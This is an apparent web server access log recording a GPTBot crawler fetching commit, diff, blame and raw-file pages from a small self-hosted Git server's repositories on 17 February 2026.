"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10721] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12970] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 26335] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15238] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 27421] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15237] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 14459] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15215] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 14420] [Gzip 7.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 27423] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 229660] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17141] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 56819] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 56831] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 196578] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 229673] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 11108] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 74.7.227.38] [Length 16010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 7504] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:13:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 174799] [Gzip 16.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17136] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 265994] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17359] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17143] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 18043] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 229667] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 265994] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" +[17/Feb/2026:13:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10011] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12448] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16153] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10666] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11354] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11521] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10500] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12203] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13326] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15936] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15725] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" +[17/Feb/2026:13:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14915] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11873] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10483] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12326] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:13:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13077] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 